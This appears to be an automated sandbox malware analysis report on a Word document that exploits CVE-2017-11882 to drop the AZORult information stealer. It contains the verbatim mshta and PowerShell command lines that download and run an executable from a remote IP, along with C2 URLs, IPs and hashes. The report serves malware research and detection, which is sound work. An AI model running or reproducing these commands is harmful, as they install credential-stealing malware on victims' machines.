analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9cce4e63d099aff951afab64eb0ff4467538dcbc

Full analysis: https://app.any.run/tasks/0061a1a6-3725-4b15-a11f-18cddc325a65
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: July 11, 2019, 13:52:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
loader
trojan
rat
azorult
Indicators:
MIME: application/octet-stream
File info: data
MD5:

24B66E53A7C7A89D78A7A0B1E6EBAEF5

SHA1:

9CCE4E63D099AFF951AFAB64EB0FF4467538DCBC

SHA256:

60DDBAD70FA21518F7E94473BBC0D3AD25C9931C81294848DD89DBDF75F76803

SSDEEP:

1536:T3z4E334444444ztMfVwX/t/X/D/z/0xdHoP13Gm+xaA2je24roQhK1pFxUw24r2:T3z4E334444444ztMfVwPGT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • d4fg.exe (PID: 2828)
      • smgi.exe (PID: 1884)
      • smgi.exe (PID: 1076)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3856)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1492)
    • Downloads executable files from IP

      • powershell.exe (PID: 1492)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2164)
    • Writes to a start menu file

      • smgi.exe (PID: 1884)
    • Connects to CnC server

      • smgi.exe (PID: 1076)
    • AZORULT was detected

      • smgi.exe (PID: 1076)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1492)
      • d4fg.exe (PID: 2828)
    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3216)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 3856)
    • Creates files in the user directory

      • mshta.exe (PID: 748)
      • powershell.exe (PID: 1492)
      • d4fg.exe (PID: 2828)
      • smgi.exe (PID: 1884)
    • Executed via COM

      • EQNEDT32.EXE (PID: 3856)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 748)
    • Starts itself from another location

      • d4fg.exe (PID: 2828)
    • Application launched itself

      • smgi.exe (PID: 1884)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2296)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3856)
    • Reads internet explorer settings

      • mshta.exe (PID: 748)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
9
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start rundll32.exe no specs winword.exe no specs eqnedt32.exe mshta.exe cmd.exe no specs powershell.exe d4fg.exe smgi.exe #AZORULT smgi.exe

Process information

PID
CMD
Path
Indicators
Parent process
3216"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\9cce4e63d099aff951afab64eb0ff4467538dcbcC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\9cce4e63d099aff951afab64eb0ff4467538dcbc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3856"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
748mshta http://bit.ly/2S9sTKU &AAAAAAAAAAAAAAA CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2164"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://35.225.200.121/BB/2099731','%temp%\d4fg.exe'); Start '%temp%\d4fg.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1492powershell (new-object System.Net.WebClienT).DownloadFile('http://35.225.200.121/BB/2099731','C:\Users\admin\AppData\Local\Temp\d4fg.exe'); Start 'C:\Users\admin\AppData\Local\Temp\d4fg.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2828"C:\Users\admin\AppData\Local\Temp\d4fg.exe" C:\Users\admin\AppData\Local\Temp\d4fg.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1884"C:\Users\admin\AppData\Roaming\suhru\smgi.exe"C:\Users\admin\AppData\Roaming\suhru\smgi.exe
d4fg.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1076"C:\Users\admin\AppData\Roaming\suhru\smgi.exe"C:\Users\admin\AppData\Roaming\suhru\smgi.exe
smgi.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 748
Read events
1 209
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
5
Unknown types
4

Dropped files

PID
Process
Filename
Type
2296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR233.tmp.cvr
MD5:
SHA256:
1492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0JA6LD7P6C5UIHRAZ10.temp
MD5:
SHA256:
2828d4fg.exeC:\Users\admin\AppData\Roaming\suhru\smgi.exe:ZoneIdentifier
MD5:
SHA256:
2296WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2728BD71C2A94A2B2D9046DAE44E4747
SHA256:8C7F5686784F258ED2CD2DB26CB8B2EFF892CAEB44930DB54018BBB83B07919A
2296WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:5D0146C12CE22392FEB423FF2AF0AC40
SHA256:290A710871B88B7FCBA40B1A31BEBDCC5C38690974E2BB858A150D771BA799A8
748mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:0FB31D7C5F62D7EFBF4AAADA1D92E840
SHA256:24BD367284564870F829063D9DD86152B654CE921200A44F92764D865E0BB24E
1492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
2828d4fg.exeC:\Users\admin\AppData\Roaming\suhru\smgi.exeexecutable
MD5:9CCBE739A3F65DB6E52BED66371398F6
SHA256:984AF712199589C8AD825C7936E7BC6FEBC25027691EAC4CA497095188105A64
748mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
1492powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFd125f.TMPbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
748
mshta.exe
GET
200
35.225.200.121:80
http://35.225.200.121/BB/2099731.hta
US
html
1.31 Kb
suspicious
1492
powershell.exe
GET
200
35.225.200.121:80
http://35.225.200.121/BB/2099731
US
executable
604 Kb
suspicious
748
mshta.exe
GET
301
67.199.248.10:80
http://bit.ly/2S9sTKU
US
html
123 b
shared
1076
smgi.exe
POST
47.74.46.147:80
http://niupx.ml/emp22/index.php
JP
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
748
mshta.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
1492
powershell.exe
35.225.200.121:80
US
suspicious
1076
smgi.exe
47.74.46.147:80
niupx.ml
Alibaba (China) Technology Co., Ltd.
JP
suspicious
748
mshta.exe
35.225.200.121:80
US
suspicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
niupx.ml
  • 47.74.46.147
malicious

Threats

PID
Process
Class
Message
748
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
748
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
748
mshta.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host HTA Request
748
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
1492
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1492
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1492
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
748
mshta.exe
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ml Domain
1076
smgi.exe
A Network Trojan was detected
ET TROJAN AZORult Variant.4 Checkin M2
1 ETPRO signatures available at the full report
No debug info